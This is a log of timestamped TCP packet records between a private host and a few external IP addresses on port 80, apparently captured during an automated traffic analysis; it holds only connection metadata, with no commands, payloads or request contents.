Aug 31, 2024 14:06:17.326313972 CEST	58130	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:17.326469898 CEST	80	58130	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:17.326482058 CEST	80	58130	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:17.326580048 CEST	58130	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:17.326580048 CEST	58130	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:17.862870932 CEST	58130	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:18.877965927 CEST	58131	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:18.886164904 CEST	80	58131	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:18.886234045 CEST	58131	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:18.898041010 CEST	58131	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:18.906786919 CEST	80	58131	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:19.813046932 CEST	80	58131	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:19.813074112 CEST	80	58131	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:19.813086033 CEST	80	58131	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:19.813100100 CEST	80	58131	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:19.813208103 CEST	80	58131	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:19.813353062 CEST	58131	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:19.813426018 CEST	80	58131	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:19.813529015 CEST	58131	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:19.813725948 CEST	80	58131	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:19.818936110 CEST	58131	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:20.405900955 CEST	58131	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:21.437881947 CEST	58132	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:21.447827101 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:21.447931051 CEST	58132	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:21.513901949 CEST	58132	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:21.518879890 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:21.518893003 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:21.518960953 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:21.518970013 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:21.518989086 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:21.518996954 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:21.519005060 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:21.519007921 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:21.519052029 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.638361931 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.638386011 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.638394117 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.638451099 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.638459921 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.638468981 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.638536930 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.638539076 CEST	58132	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:22.638577938 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.638614893 CEST	58132	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:22.638614893 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.638725042 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.638762951 CEST	58132	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:22.643871069 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.643913031 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.643923044 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.643954039 CEST	58132	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:22.644346952 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.644390106 CEST	58132	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:22.644402981 CEST	80	58132	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:22.644445896 CEST	58132	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:23.017877102 CEST	58132	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:24.043716908 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:24.048717976 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:24.048785925 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:24.058834076 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:24.063704014 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:24.994774103 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:24.994792938 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:24.994810104 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:24.994885921 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:24.994993925 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:24.995009899 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:24.995021105 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:24.995034933 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:24.995039940 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:24.995050907 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:24.995059013 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:24.995065928 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:24.995069027 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:24.995084047 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:24.995189905 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:24.999836922 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:24.999847889 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:24.999862909 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:24.999878883 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:25.000133038 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:25.000159025 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:25.046413898 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:25.229407072 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:25.229424000 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:25.229435921 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:25.229502916 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:25.229513884 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:25.229517937 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:25.229577065 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:25.229650974 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:25.229700089 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:25.229748964 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:25.229908943 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:25.229959011 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:25.230026007 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:25.230035067 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:25.230038881 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:25.230063915 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:25.230135918 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:25.234885931 CEST	58133	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:25.240191936 CEST	80	58133	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:30.335273981 CEST	58134	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:30.340632915 CEST	80	58134	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:30.340691090 CEST	58134	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:30.369291067 CEST	58134	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:30.374089003 CEST	80	58134	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:31.874893904 CEST	58134	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:31.885895014 CEST	80	58134	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:31.886141062 CEST	58134	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:32.918194056 CEST	58135	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:32.923199892 CEST	80	58135	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:32.923290968 CEST	58135	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:32.942600012 CEST	58135	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:32.947534084 CEST	80	58135	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:33.387937069 CEST	80	58135	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:33.388001919 CEST	58135	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:34.452754021 CEST	58135	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:34.457604885 CEST	80	58135	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:35.537311077 CEST	58136	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:35.542821884 CEST	80	58136	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:35.542944908 CEST	58136	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:35.614917994 CEST	58136	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:35.619784117 CEST	80	58136	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:35.619795084 CEST	80	58136	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:35.619846106 CEST	80	58136	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:35.619961023 CEST	80	58136	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:35.619967937 CEST	80	58136	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:35.620033979 CEST	80	58136	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:35.620042086 CEST	80	58136	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:35.620049953 CEST	80	58136	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:35.620054007 CEST	80	58136	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:36.001461029 CEST	80	58136	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:36.001514912 CEST	58136	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:37.124830008 CEST	58136	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:37.129736900 CEST	80	58136	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:38.144854069 CEST	58137	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:38.149804115 CEST	80	58137	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:38.149863958 CEST	58137	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:38.157658100 CEST	58137	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:38.162890911 CEST	80	58137	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:38.606920004 CEST	80	58137	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:38.609610081 CEST	80	58137	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:38.609677076 CEST	58137	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:38.610622883 CEST	58137	80	192.168.2.4	3.33.130.190
Aug 31, 2024 14:06:38.615746975 CEST	80	58137	3.33.130.190	192.168.2.4
Aug 31, 2024 14:06:44.404352903 CEST	58138	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:44.409240961 CEST	80	58138	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:44.409301996 CEST	58138	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:44.481899977 CEST	58138	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:44.486831903 CEST	80	58138	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:44.938508987 CEST	80	58138	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:44.938900948 CEST	80	58138	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:44.938956022 CEST	58138	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:46.001003027 CEST	58138	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:47.028918982 CEST	58139	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:47.033812046 CEST	80	58139	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:47.033982038 CEST	58139	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:47.111680031 CEST	58139	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:47.116561890 CEST	80	58139	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:47.545425892 CEST	80	58139	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:47.545635939 CEST	80	58139	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:47.545751095 CEST	58139	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:48.624674082 CEST	58139	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:49.643563986 CEST	58140	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:49.648494959 CEST	80	58140	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:49.648566961 CEST	58140	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:49.660988092 CEST	58140	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:49.665931940 CEST	80	58140	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:49.665941954 CEST	80	58140	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:49.666038036 CEST	80	58140	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:49.666053057 CEST	80	58140	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:49.666062117 CEST	80	58140	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:49.666248083 CEST	80	58140	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:49.666268110 CEST	80	58140	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:49.666321993 CEST	80	58140	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:49.666363001 CEST	80	58140	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:50.169796944 CEST	80	58140	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:50.173676968 CEST	80	58140	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:50.173717976 CEST	58140	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:51.174932003 CEST	58140	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:52.191947937 CEST	58141	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:52.199194908 CEST	80	58141	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:52.199258089 CEST	58141	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:52.208524942 CEST	58141	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:52.213346958 CEST	80	58141	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:52.704786062 CEST	80	58141	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:52.704900026 CEST	80	58141	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:52.705107927 CEST	58141	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:52.709517002 CEST	58141	80	192.168.2.4	35.244.245.121
Aug 31, 2024 14:06:52.714365005 CEST	80	58141	35.244.245.121	192.168.2.4
Aug 31, 2024 14:06:57.737065077 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:57.741905928 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:57.747051001 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:57.758927107 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:57.763712883 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.386106968 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.437104940 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.556886911 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.556904078 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.556916952 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.556950092 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.557040930 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.557051897 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.557064056 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.557074070 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.557081938 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.557087898 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.557100058 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.557102919 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.557122946 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.557638884 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.557679892 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.557703972 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.561870098 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.561881065 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.561908960 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.562396049 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.562436104 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.643793106 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.643902063 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.643944025 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.643955946 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.643969059 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.644015074 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.648677111 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.648689032 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.648731947 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.648822069 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.648833990 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.648871899 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.653426886 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.653439999 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.653482914 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.653675079 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.653687000 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.653697968 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.653732061 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.658153057 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.658165932 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.658195019 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.658575058 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.658586979 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.658616066 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.662950993 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.662962914 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.662998915 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.663301945 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.663314104 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.663325071 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.663338900 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.663367033 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:58.667639017 CEST	80	58142	188.114.96.3	192.168.2.4
Aug 31, 2024 14:06:58.667701006 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:06:59.284255981 CEST	58142	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:00.302335978 CEST	58143	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:00.309326887 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:00.309408903 CEST	58143	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:00.326338053 CEST	58143	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:00.331356049 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:00.963885069 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.109106064 CEST	58143	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:01.131850004 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.131865978 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.132092953 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.132102966 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.132113934 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.132122993 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.132134914 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.132144928 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.132153988 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.132163048 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.132170916 CEST	58143	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:01.132179976 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.132285118 CEST	58143	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:01.137063026 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.137073994 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.137089968 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.145934105 CEST	58143	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:01.222279072 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.222290993 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.222302914 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.222474098 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.222485065 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.222495079 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.222565889 CEST	58143	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:01.222565889 CEST	58143	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:01.222882032 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.222899914 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.222912073 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.222922087 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.222934008 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.223831892 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.223843098 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.223855972 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.223865986 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.223871946 CEST	58143	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:01.223879099 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.223923922 CEST	58143	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:01.223923922 CEST	58143	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:01.224627018 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.224647045 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.224659920 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.224670887 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.224683046 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.225442886 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.225454092 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.225466013 CEST	80	58143	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:01.225517988 CEST	58143	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:01.229981899 CEST	58143	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:02.155942917 CEST	58143	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:03.176955938 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:03.181926012 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.185939074 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:03.194960117 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:03.200066090 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.200099945 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.200165987 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.200184107 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.200195074 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.200206041 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.200259924 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.200273037 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.200284004 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.826123953 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.874672890 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:03.974883080 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.974896908 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.974910975 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.974926949 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.974937916 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.974950075 CEST	58144	80	192.168.2.4	188.114.96.3
